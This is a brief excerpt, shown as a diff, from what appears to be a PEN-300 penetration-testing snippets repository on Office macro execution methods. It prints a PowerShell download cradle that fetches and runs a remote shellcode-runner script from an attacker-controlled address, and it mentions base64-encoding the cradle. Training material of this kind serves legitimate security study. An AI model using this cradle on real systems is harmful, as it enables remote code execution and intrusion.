trike33/PEN-300-Code-Snippets/Macro execution methods.md

 IEX(New-Object System.Net.WebClient).downloadString('http://192.168.1.1/run.ps1')

-The run.ps1 file is a powershell shellcode runner.
+The run.ps1 file is a powershell shellcode runner(https://github.com/trike33/PEN-300-Code-Snippets/blob/main/powershell_reflection_shellcoderunner.ps1).
 Due to the complexity of this technique, we will base64 encode our PowerShell download cradle as follows:
 ~# pwsh
 ❯ pwsh
 PowerShell 7.2.1